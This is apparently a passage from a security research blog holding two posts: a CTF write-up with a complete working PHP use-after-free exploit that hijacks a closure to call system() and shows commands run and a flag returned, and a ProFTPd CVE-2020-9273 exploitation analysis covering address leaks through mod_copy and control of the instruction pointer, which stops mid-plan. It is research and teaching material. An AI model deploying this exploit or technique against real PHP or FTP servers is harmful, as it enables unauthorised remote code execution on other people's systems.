private function write(&$str, $p, $v, $n = 8) {
    $i = 0;
    for ($i = 0; $i < $n; $i++) {
        $str[$p + $i] = chr($v & 0xff);
        $v >>= 8;
    }
}
private function leak($addr, $p = 0, $s = 8) {
    $this->write($this->placeholder, 0x10, $addr);
    $leak = strlen($this->helper->a);
    if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
    return $leak;
    }

Iggy & The Stooges - Search And Destroy

The next step in our exploit is to search where the basic_functions structure is located in memory, and then walk it until we find the handler for zif_system or similar functions that allow us the execution of commands. Although this is really well explained in the quoted article, let’s just give it a short explanation here.

In PHP the β€œbasic” functions are grouped into basic_functions for registration, this being an array of zend_function_entry structures. Therefore, in this basic_functions we will have, ultimately, an ordered relationship of function names along with the pointer to them (handlers). The zend_function_entry structure is defined as:

typedef struct _zend_function_entry {
    const char *fname;
    void (*handler)(INTERNAL_FUNCTION_PARAMETERS);
    const struct _zend_internal_arg_info *arg_info;
    uint32_t num_args;
    uint32_t flags;
} zend_function_entry;

So the first member is a pointer to a string that contains the function name, and the next member is a handler to that function. In order to identify a member of the basic_functions structure we can follow the next approach:

  1. Read 8 bytes from an address β€”> Interpret those bytes as a pointer –> Read 8 bytes at the pointed memory
  2. Does the 8 bytes match our needle (bin2hex function name) ? If it doesn’t, increase the address by 8 and repeat 1

It can be translated to:

private function get_basic_funcs($base) {
    for ($i = 0; $i < 0x6700/8; $i++) {
        $leak = $this->leak($base - $i * 8);
        if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
            $deref = $this->leak($leak);
            if ($deref != 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex
                continue;
            }
        } else continue;
        return $base - ($i-2) * 8;
    }
}

Once we have found where the zend_function_entry that holds the information for bin2hex() is located, we can repeat the process to locate the handler for zif_system:

    private function get_system($basic_funcs) {
    $addr = $basic_funcs;
    $i = 0;
    do {
        $f_entry = $this->leak($addr-0x10);
        $f_name = $this->leak($f_entry);
        if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
            return $this->leak($addr + 8-0x10);
        }
        $addr += 0x20;
        $i += 1;
    } while ($f_entry != 0);
    return false;
}

Another aproach to locate the zif_system handler could be to just apply a pre-known offset to the zend_function_entry for bin2hex because the entries in the array are ordered.

Van Halen - Jump

Our exploit has all the ingredients ready, except from the last one: jumping into the target function. In order to call zif_system we are going to add a closure to our helper object and overwrite it. Closures are anonymous functions with the following structure:

typedef struct _zend_closure {
    zend_object std;
    zend_function func;
    zval this_ptr;
    zend_class_entry *called_scope;
    zif_handler orig_internal_handler;
} zend_closure;

If we look carefully we can see that one of the members is a zend_function structure:

union _zend_function {
	zend_uchar type;	/* MUST be the first element of this struct! */
	zend_op_array op_array;
	zend_internal_function internal_function;
};

And zend_internal_function is:

typedef struct _zend_internal_function {
    /* Common elements */
    zend_uchar type;
    zend_uchar arg_flags[3]; /* bitset of arg_info.pass_by_reference */
    uint32_t fn_flags;
    zend_string* function_name;
    zend_class_entry *scope;
    zend_function *prototype;
    uint32_t num_args;
    uint32_t required_num_args;
    zend_internal_arg_info *arg_info;
    /* END of common elements */
    zif_handler handler;
    struct _zend_module_entry *module;
    void *reserved[ZEND_MAX_RESERVED_RESOURCES];
} zend_internal_function;

We can see the handler member. So the plan is easy:

  1. Copy the original zend_closure structure to other part
  2. Patch the $helper object to point to this new location instead of the original
  3. Patch the handler member to point to our zif_system
  4. Call the closure

The resultant code:

//...
$this->helper->b = function ($x) { };
//...
$fake_obj_offset = 0xd8;
for ($i = 0; $i < 0x110; $i += 8) {
	$this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
}
$fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr);
$this->write($this->placeholder, 0x20, $fake_obj_addr);
$this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
$this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
     
($this->helper->b)($cmd);

Original closure:

gef➀  print (zend_closure) * 0x7ffff3e5ce00
$5 = {
  std = {
    gc = {
      refcount = 0x1, 
      u = {
        type_info = 0x18
      }
    }, 
    handle = 0x5, 
    ce = 0x5555567ea530, 
    handlers = 0x55555676daa0 <closure_handlers>, 
 ...
    internal_function = {
      type = 0x2, 
      arg_flags = "\000\000", 
      fn_flags = 0x2100001, 
      function_name = 0x7ffff3e01960, 
      scope = 0x7ffff3e032a0, 
      prototype = 0x0, 
      num_args = 0x1, 
      required_num_args = 0x1, 
      arg_info = 0x7ffff3e6b0c0, 
      handler = 0x100000000, 
      module = 0x200000000, 
      reserved = {0x7ffff3e72140, 0x7ffff3e03630, 0x7ffff3e5ce90, 0x0, 0x7ffff3e8d018, 0x7ffff3e8d010}
    }
...

Fake closure after patching it:

gef➀  print (zend_closure) * 0x7ffff3e7a240
$6 = {
  std = {
    gc = {
      refcount = 0x2, 
      u = {
        type_info = 0x18
      }
    }, 
    handle = 0x5, 
    ce = 0x5555567ea530, 
    handlers = 0x55555676daa0 <closure_handlers>, 
...
    internal_function = {
      type = 0x1, 
      arg_flags = "\000\000", 
      fn_flags = 0x2100001, 
      function_name = 0x7ffff3e01960, 
      scope = 0x7ffff3e032a0, 
      prototype = 0x0, 
      num_args = 0x1, 
      required_num_args = 0x1, 
      arg_info = 0x7ffff3e6b0c0, 
      handler = 0x555555965e1b <zif_system>, <---- :D
      module = 0x200000000, 
      reserved = {0x7ffff3e72140, 0x7ffff3e03630, 0x7ffff3e5ce90, 0x0, 0x7ffff3e8d018, 0x7ffff3e8d010}
    }
...

Chaining all together the exploit is:

<?php

class Helper { public $a, $b, $c, $d; } 

class exploit {
    public function __construct($cmd) {
        $concat_result_addr = $this->leak_heap();
        print "[+] Concated string address:\n0x";
        print dechex($concat_result_addr);
        $this->placeholder = $this->alloc(0x4F, "B");
        $placeholder_addr = $concat_result_addr+0xe0;
        print "\n[+] Placeholder string address:"; 
        print "\n0x".dechex($placeholder_addr);
        $this->free($placeholder_addr);
        $this->helper = new Helper;
        $this->helper->a = "KKKK";
        $this->helper->b = function ($x) { };
        print "\n[+] std_object_handlers:\n";
        $std_object_handlers = $this->str2ptr($this->placeholder);
        print "0x" . dechex($std_object_handlers) . "\n";
        $closure_addr = $this->str2ptr($this->placeholder, 0x20);
        print "[+] Closure:\n";
        print "0x" . dechex($closure_addr) . "\n";
       
        $basic = $this->get_basic_funcs($std_object_handlers);
        print "[+] basic_funcs:\n";
        print "0x" . dechex($basic) . "\n";
        $system = $this->get_system($basic);
        print "[+] zif_system:\n";
        print "0x" . dechex($system);

        $fake_obj_offset = 0xd8;
        for ($i = 0; $i < 0x110; $i += 8) {
            $this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
        }
        $fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
        print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr) . "\n\n";
        $this->write($this->placeholder, 0x20, $fake_obj_addr);
        $this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
        $this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
        
        ($this->helper->b)($cmd);
    }

    private function leak_heap() {
		$contiguous = [];
     		for ($i = 0; $i < 10; $i++) {
				$contiguous[] = $this->alloc(0x100, "D");
     		}
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1337;
            $buf = str_repeat("\x00", 0x100);
        });
        $arr[1] .= $this->alloc(0x4A, "F");
        return $this->str2ptr($buf, 16);
    }

    private function free($var_addr) {

        $contiguous = [];
            for ($i = 0; $i < 10; $i++) {
                $contiguous[] = $this->alloc(0x100, "D");
            }
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
    }


    private function alloc($size, $canary) {
        return str_shuffle(str_repeat($canary, $size));
    }


    private function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for ($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function leak($addr, $p = 0, $s = 8) {
        $this->write($this->placeholder, 0x10, $addr);
        $leak = strlen($this->helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    private function get_basic_funcs($base) {
        for ($i = 0; $i < 0x6700/8; $i++) {
            $leak = $this->leak($base - $i * 8);
            if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
                $deref = $this->leak($leak);
                if ($deref != 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex
                    continue;
                }
            } else continue;
            return $base - ($i-2) * 8;
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        $i = 0;
        do {
            $f_entry = $this->leak($addr-0x10);
            $f_name = $this->leak($f_entry);
            if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
                return $this->leak($addr + 8-0x10);
            }
            $addr += 0x20;
            $i += 1;
        } while ($f_entry != 0);
        return false;
    }
}

new exploit("id");
?>

Fire in the hole!

➜  concat-exploit php blog05.php 
[+] Concated string address:
0x7f9e2c07a070
[+] Placeholder string address:
0x7f9e2c07a150
[+] std_object_handlers:
0x564fde7127c0
[+] Closure:
0x7f9e2c05ce00
[+] basic_funcs:
0x564fde70c760
[+] zif_system:
0x564fdd925e1b
[+] Fake Closure addr:
0x7f9e2c07a240

uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

Epilogue

If you run the exploit in our environment, you will notice that it does not work. We built the exploit for a slighly different PHP version and all our tests were executed via PHP-CLI. The changes needed are:

  1. Move the 0x100 used in the str_repeat() to a constant. We are still atonished about this poltergeist.
  2. Change the β€œneedle” used to identify the basic_functions array. From 0x6e69623278656800 to 0x73006e6962327865.
  3. Change the offset in the get_system() in 0x20, so the -0x10 should be a +0x10

The final exploit is:

<?php



class Helper { public $a, $b, $c, $d; }  //alloc(0x4F)

class exploit {
    const FILL = 0x100;
    public function __construct($cmd) {
        
        $concat_result_addr = $this->leak_heap();
        print "[+] Concated string address:\n0x";
        print dechex($concat_result_addr);
        $this->placeholder = $this->alloc(0x4F, "B");
        $placeholder_addr = $concat_result_addr+0xe0;
        print "\n[+] Placeholder string address:"; 
        print "\n0x".dechex($placeholder_addr);
        $this->free($placeholder_addr);
        $this->helper = new Helper;
        $this->helper->a = "KKKK";
        $this->helper->b = function ($x) { };
        print "\n[+] std_object_handlers:\n";
        $std_object_handlers = $this->str2ptr($this->placeholder);
        print "0x" . dechex($std_object_handlers) . "\n";
        $closure_addr = $this->str2ptr($this->placeholder, 0x20);
        print "[+] Closure:\n";
        print "0x" . dechex($closure_addr) . "\n";
       
        $basic = $this->get_basic_funcs($std_object_handlers);
        print "[+] basic_funcs:\n";
        print "0x" . dechex($basic) . "\n";
        $system = $this->get_system($basic);
        print "[+] zif_system:\n";
        print "0x" . dechex($system);


        $fake_obj_offset = 0xd8;

        for ($i = 0; $i < 0x110; $i += 8) {
            $this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
        }

        $fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
        print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr);

        $this->write($this->placeholder, 0x20, $fake_obj_addr);
        $this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
        $this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
        print "\nYour commnad, Sir:\n"; 
        print ($this->helper->b)($cmd);
    }


    private function leak_heap() {
        $contiguous = [];
        for ($i = 0; $i < 100; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }

        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1337;
            $buf = str_repeat("\x00", self::FILL);
        });
        $arr[1] .= $this->alloc(0x4F-5, "F");
        return $this->str2ptr($buf, 16);
    }
    private function free($var_addr) {

        for ($i = 0; $i < 100; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }

        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf, &$var_addr, &$payload) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
    }

    private function alloc($size, $canary) {
        return str_shuffle(str_repeat($canary, $size));
    }


    private function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for ($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function leak($addr, $p = 0, $s = 8) {
        $this->write($this->placeholder, 0x10, $addr);
        $leak = strlen($this->helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    private function get_basic_funcs($base) {
        for ($i = 0; $i < 0x6900/8; $i++) {
            $leak = $this->leak($base - $i * 8);
            if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
                $deref = $this->leak($leak);
                if ($deref != 0x73006e6962327865){ // 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex  
        continue;
                }
            } else continue;
            return $base - ($i-2) * 8;
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        $i = 0;
        do {
            $f_entry = $this->leak($addr-0x10);
            $f_name = $this->leak($f_entry,8);
            if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
                return $this->leak($addr + 8+0x10);
            }
            $addr += 0x20;
            $i += 1;
        } while ($f_entry != 0); 
        return false;
    }
}

new exploit("cat /flag");

?>

Upload and execute it:

AdeptsOf0xCC{PHP_is_the_UAF_land}
AdeptsOf0xCC{PHP_is_the_UAF_land}

EoF

We hope you enjoyed this challenge!

Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273)

9 August 2021 at 00:00

Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and it can lead to Post-Auth Remote Code Execution. Please, take a seat and listen to the story.

Introduction

This post will analyze the vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc).

First of all I want to mention:

  • @DUKPT_ who is also working on a PoC for this vulnerability, for his approach on overwriting gid_tab->pool which is the one I decided to use on the exploit (will be explained later in this post)
  • Antonio Morales @nosoynadiemas for discovering this vulnerability, you can find more information about how he discovered it on his post Fuzzing sockets, part 1: FTP servers

Vulnerability

To trigger the vulnerability, we need to first start a new data channel transference, then interrupt through command channel while data channel is still open.

Using the data channel, we can fill heap memory to overwrite the resp_pool struct, which is session.curr_cmd_rec->pool at this time.

The result of triggering the vulnerability successfully is full control over resp_pool:

gef➀  p p
$3 = (struct pool_rec *) 0x555555708220
gef➀  p resp_pool
$4 = (pool *) 0x555555708220
gef➀  p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➀  p *resp_pool
$6 = {
  first = 0x4141414141414141,
  last = 0x4141414141414141,
  cleanups = 0x4141414141414141,
  sub_pools = 0x4141414141414141,
  sub_next = 0x4141414141414141,
  sub_prev = 0x4141414141414141,
  parent = 0x4141414141414141,
  free_first_avail = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>,
  tag = 0x4141414141414141 <error: Cannot access memory at address 0x4141414141414141>
}

Obviously, as there are not valid pointers in the struct, we end up on a segmentation fault on this line of code:


first_avail = blok->h.first_avail

blok, which coincides with the p->last value, is 0x4141414141414141 at that time

The ProFTPd Pool Allocator

The ProFTPd pool allocator is the same as the Apache.

Allocations here take place using palloc() and pcalloc(), which are wrapping functions for alloc_pool()

ProFTPd Pool Allocator works with blocks, which are actual glibc heap chunks.

Each block has a block_hdr header structure that defines it:


union block_hdr {
  union align a;

  /* Padding */
#if defined(_LP64) || defined(__LP64__)
  char pad[32];
#endif

  /* Actual header */
  struct {
    void *endp;
    union block_hdr *next;
    void *first_avail;
  } h;
};

  • blok->h.endp points to the end of current block
  • blok->h.next points to the next block in a linked list
  • blok->h.first_avail points to the first available memory within this block

This is the alloc_pool() code:


static void *alloc_pool(struct pool_rec *p, size_t reqsz, int exact) {

  size_t nclicks = 1 + ((reqsz - 1) / CLICK_SZ);
  size_t sz = nclicks * CLICK_SZ;
  union block_hdr *blok;
  char *first_avail, *new_first_avail;

  blok = p->last;
  if (blok == NULL) {
    errno = EINVAL;
    return NULL;
  }

  first_avail = blok->h.first_avail;

  if (reqsz == 0) {
    errno = EINVAL;
    return NULL;
  }

  new_first_avail = first_avail + sz;

  if (new_first_avail <= (char *) blok->h.endp) {
    blok->h.first_avail = new_first_avail;
    return (void *) first_avail;
  }

  pr_alarms_block();

  blok = new_block(sz, exact);
  p->last->h.next = blok;
  p->last = blok;

  first_avail = blok->h.first_avail;
  blok->h.first_avail = sz + (char *) blok->h.first_avail;

  pr_alarms_unblock();
  return (void *) first_avail;
}

As we can see, it first tries to use memory within the same block, if no space, is allocates a new block with new_block() and updates the pool last block on p->last.

Pool headers, defined by pool_rec structure, are stored right after the first block created for that pool, as we can see on make_sub_pool() which creates a new pool:


struct pool_rec *make_sub_pool(struct pool_rec *p) {
  union block_hdr *blok;
  pool *new_pool;

  pr_alarms_block();

  blok = new_block(0, FALSE);

  new_pool = (pool *) blok->h.first_avail;
  blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;

  memset(new_pool, 0, sizeof(struct pool_rec));
  new_pool->free_first_avail = blok->h.first_avail;
  new_pool->first = new_pool->last = blok;

  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;

    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool;

    p->sub_pools = new_pool;
  }

  pr_alarms_unblock();

  return new_pool;
}

Actually, make_sub_pool() is responsible for creating the permanent pool aswell, which has no parent. p will be NULL when doing it.

Looking at make_sub_pool() code, you can realize that it gets a new block, and just after the block_hdr headers, pool_rec headers are entered and blok->h.first_avail is updated to point right after it.

Then, entries of the new created pool are initialized.

The p->cleanups entry is a pointer to a cleanup_t struct:


typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct cleanup *next;

} cleanup_t;

Cleanups are interpreted by the function run_cleanups() and registered with the function register_cleanup()

A chain of blocks can be freed using free_blocks():


static void free_blocks(union block_hdr *blok, const char *pool_tag) {

  union block_hdr *old_free_list = block_freelist;

  if (!blok)
    return;

  block_freelist = blok;

  while (blok->h.next) {
    chk_on_blk_list(blok, old_free_list, pool_tag);
    blok->h.first_avail = (char *) (blok + 1);
    blok = blok->h.next;
  }

  chk_on_blk_list(blok, old_free_list, pool_tag);
  blok->h.first_avail = (char *) (blok + 1);
  blok->h.next = old_free_list;
}

Exploitation Analysis

We have control over a really interesting pool_rec struct, now we might need to search for primitives that allow us to get something useful from this vulnerability, like obtaining Remote Code Execution.

Leaking memory addresses

Obviously to exploit this vulnerability predictable memory addresses is a requirement before using primitives, as in this case, the exploitation consists on playing with pointers, structs and memory writes.

Leaking memory addresses on this situation is really hard, as we are on a cleanup/session finishing process and to trigger the vulnerability we actually need to generate an interruption.

I first thought about reading /proc/self/maps file, which can be read by any process, even with low privileges.

Perhaps in theory it would work, unfortunately ProFTPd uses stat syscall to retrieve file size, as stat over pseudo-files like maps returns zero, this breaks transfer, and 0 bytes are returned back to client on data channel.

Thinking on additional ways to do it, I realized about mod_copy, which is a module in ProFTPd that allows you to copy files within the server.

We can use mod_copy to copy the file from /proc/self/maps to /tmp, and once there, we perform a normal transfer over the file at /tmp which is not a pseudo-file now, so /proc/self/maps content will be returned to attacker.

This leak is really interesting as it gives you addresses for every segment, and even the filename of the shared libraries, which sometimes contain versions like libc-2.31.so, and this is really interesting for exploit reliability, we could use offsets for specific libc versions.

Hijacking the control-flow

We have to transform our control over session.curr_cmd_rec->pool into any write primitive allowing us to reach run_cleanups() somehow with an arbitrary cleanup_t struct.

Looking for struct entry writes, there was nothing useful that would allow us direct write-what-where primitives (would be a lot easier this way).

Instead, the only way we can use to write something on arbitrary addresses is to use make_sub_pool() (at pool.c:415), which is called with cmd->pool as argument at some point:


struct pool_rec *make_sub_pool(struct pool_rec *p) {
  union block_hdr *blok;
  pool *new_pool;

  pr_alarms_block();

  blok = new_block(0, FALSE);

  new_pool = (pool *) blok->h.first_avail;
  blok->h.first_avail = POOL_HDR_BYTES + (char *) blok->h.first_avail;

  memset(new_pool, 0, sizeof(struct pool_rec));
  new_pool->free_first_avail = blok->h.first_avail;
  new_pool->first = new_pool->last = blok;

  if (p) {
    new_pool->parent = p;
    new_pool->sub_next = p->sub_pools;

    if (new_pool->sub_next)
      new_pool->sub_next->sub_prev = new_pool;

    p->sub_pools = new_pool;
  }

  pr_alarms_unblock();

  return new_pool;
}

This function is called at main.c:287 from _dispatch() function with our controlled pool as argument:


...

      if (cmd->tmp_pool == NULL) {
        cmd->tmp_pool = make_sub_pool(cmd->pool);
        pr_pool_tag(cmd->tmp_pool, "cmd_rec tmp pool");
      }
      
...

As you can see new_pool->sub_next has now the value of p->sub_pools, which is controlled, then we enter on new_pool->sub_next->sub_prev the new_pool pointer.

This means, we can write to any arbitrary address the value of new_pool, which apparently, appears not to be so useful at all, as the only relationship we have with this newly created pool cmd->tmp_pool is that cmd->tmp_pool->parent is equal to resp_pool as we are the parent pool for it.

Also the only value we control is the new_pool->sub_next, which we actually use for the write primitive.

What more interesting primitives do we have?

On a previous section we explained how the ProFTPd pool allocator works, when a new pool is created, p->first and p->last point to blocks used for the pool, we are interested in the p->last as it is the block that is actually used, as we can see on alloc_pool() at pool.c:570:

...

  blok = p->last;
  if (blok == NULL) {
    errno = EINVAL;
    return NULL;
  }

  first_avail = blok->h.first_avail;
  
...

first_avail is the pointer to the limit between used data and available free space, which is where we will start to allocate memory.

Our pool is passed to pstrdup() multiple times for string allocation:


char *pstrdup(pool *p, const char *str) {
  char *res;
  size_t len;

  if (p == NULL ||
      str == NULL) {
    errno = EINVAL;
    return NULL;
  }

  len = strlen(str) + 1;

  res = palloc(p, len);
  if (res != NULL) {
    sstrncpy(res, str, len);
  }

  return res;
}

This function calls palloc() which ends up calling alloc_pool()

The allocations are mostly non-controllable strings, which seem not useful to us, except from one allocation at cmd.c:373 on function pr_cmd_get_displayable_str():

...

  if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
      pstrdup(cmd->pool, res), 0) < 0) {
    if (errno != EEXIST) {
      pr_trace_msg(trace_channel, 4,
        "error setting 'displayable-str' command note: %s", strerror(errno));
    }
  }
  
...

As you can see, cmd->pool (our controlled pool) is passed to pstrdup(), and as seen at cmd.c:363:


...

  if (argc > 0) {
    register unsigned int i;

    res = pstrcat(p, res, pr_fs_decode_path(p, argv[0]), NULL);

    for (i = 1; i < argc; i++) {
      res = pstrcat(p, res, " ", pr_fs_decode_path(p, argv[i]), NULL);
    }
  }

... 
 

res points to our last command sent


...

  if (pr_table_add(cmd->notes, pstrdup(cmd->pool, "displayable-str"),
      pstrdup(cmd->pool, res), 0) < 0) {
    if (errno != EEXIST) {
      pr_trace_msg(trace_channel, 4,
        "error setting 'displayable-str' command note: %s", strerror(errno));
    }
  }
  
...

This means if we send arbitrary data instead of a command, we could enter custom data on pool block space, and as we can corrupt p->last we can make blok->h.first_avail point to any address we want, and this means we can overwrite through a command any data.

Unfortunately, it is not like our corruption from data channel, as here our commands are treated as strings, and not binary data as the data channel does.

This means we are very limited on overwriting structs or any useful data.

Also, some allocations happen before, and the heap from the intial value of blok->h.first_avail to that value when pstrdup()β€˜ing our command will be full of strings, and non valid pointers which could likely end up on a crash before reaching run_cleanups().

Initially, I decided to use blok->h.first_avail to overwrite cmd->tmp_pool entries with arbitrary data.

This pool is freed with destroy_pool() at main.c:409 on function _dispatch():


...

      destroy_pool(cmd->tmp_pool);
      cmd->tmp_pool = NULL;
      
...

This means if we control the cmd->tmp_pool->cleanups value when reaching clear_pool() we would have the ability to control RIP and RDI once run_cleanups() is called:


void destroy_pool(pool *p) {
  if (p == NULL) {
    return;
  }

  pr_alarms_block();

  if (p->parent) {
    if (p->parent->sub_pools == p) {
      p->parent->sub_pools = p->sub_next;
    }

    if (p->sub_prev) {
      p->sub_prev->sub_next = p->sub_next;
    }

    if (p->sub_next) {
      
      p->sub_next->sub_prev = p->sub_prev;
    }
  }

  clear_pool(p);
  free_blocks(p->first, p->tag);

  pr_alarms_unblock();
  
}

As you can see clear_pool() is called, but after accessing some of the entries of the pool, which must be either NULL or a valid writable address.

Once clear_pool() is called:


static void clear_pool(struct pool_rec *p) {

  /* Sanity check. */
  if (p == NULL) {
    return;
  }

  pr_alarms_block();

  run_cleanups(p->cleanups);
  p->cleanups = NULL;

  while (p->sub_pools) {
    destroy_pool(p->sub_pools);
  }

  p->sub_pools = NULL;

  free_blocks(p->first->h.next, p->tag);
  p->first->h.next = NULL;

  p->last = p->first;
  p->first->h.first_avail = p->free_first_avail;

  pr_alarms_unblock();
}

We can see that run_cleanups() is called directly without more checks / memory writes.

When calling function run_cleanups():


static void run_cleanups(cleanup_t *c) {
  while (c) {
    if (c->plain_cleanup_cb) {
      (*c->plain_cleanup_cb)(c->data);
    }

    c = c->next;
  }
}

Looking at cleanup_t struct:


typedef struct cleanup {
  void *data;
  void (*plain_cleanup_cb)(void *);
  void (*child_cleanup_cb)(void *);
  struct cleanup *next;

} cleanup_t;

We can control RIP with c->plain_cleanup_cb and RDI with c->data

Unfortunately, corrupting cmd->tmp_pool is difficult, as a string displayable-str is appended right after our controllable data, and right after our p->cleanup entry there are some entries that are accessed on destroy_pool() before reaching run_cleanups().

@DUKPT_ who is also working on a PoC for this vulnerability was overwriting gid_tab->pool. Which is a more reliable technique as there are no pointers after our controllable data, so when displayable-str is appended, nothing serious will be broken, and also, here, instead of corrupting a pool_rec structure, we corrupt a pr_table_t structure, so we can point gid_tab->pool to memory corrupted from the data channel, which also accepts NULLs and we can craft a fake pool_rec structure with an arbitrary p->cleanup value to a fake cleanup_t struct which will be finally passed to run_cleanups().

The interesting use of gid_tab is also that gid_tab->pool is passed to destroy_pool() on pr_table_free() with argument gid_tab:


int pr_table_free(pr_table_t *tab) {

  if (tab == NULL) {
    errno = EINVAL;
    return -1;
  }

  if (tab->nents != 0) {
    errno = EPERM;
    return -1;
  }

  destroy_pool(tab->pool);
  return 0;
}

This is how pr_table_t looks like:


struct table_rec {
  pool *pool;
  unsigned long flags;
  unsigned int seed;
  unsigned int nmaxents;
  pr_table_entry_t **chains;
  unsigned int nchains;
  unsigned int nents;
  pr_table_entry_t *free_ents;
  pr_table_key_t *free_keys;
  pr_table_entry_t *tab_iter_ent;
  pr_table_entry_t *val_iter_ent;
  pr_table_entry_t *cache_ent;
  int (*keycmp)(const void *, size_t, const void *, size_t);
  unsigned int (*keyhash)(const void *, size_t);
  void (*entinsert)(pr_table_entry_t **, pr_table_entry_t *);
  void (*entremove)(pr_table_entry_t **, pr_table_entry_t *);
};

...

typedef struct table_rec pr_table_t;

As you can see after tab->pool (tab->flags, tab->seed and tab->nmaxents) there are no pointers so the string appended will not trigger crashes

So, what is the plan?

1) Craft a fake block_hdr structure that will be pointed to by p->last

2) Enter on fake_blok->h.first_avail a pointer to gid_tab minus some offset, where offset is depending on the number of allocations and their size, so when pstrdup() copies our arbitrary command, fake_blok->h.first_avail value is exactly the address of gid_tab to fit our address

3) Enter on p->sub_next the address of tab->chains so when pr_table_kget() is called, NULL is returned to make our arbitrary command being allocated.

4) Send a custom command with a fake pr_table_t, actually, just the tab->pool is needed, and point fake_tab->pool to a fake pool_rec struct

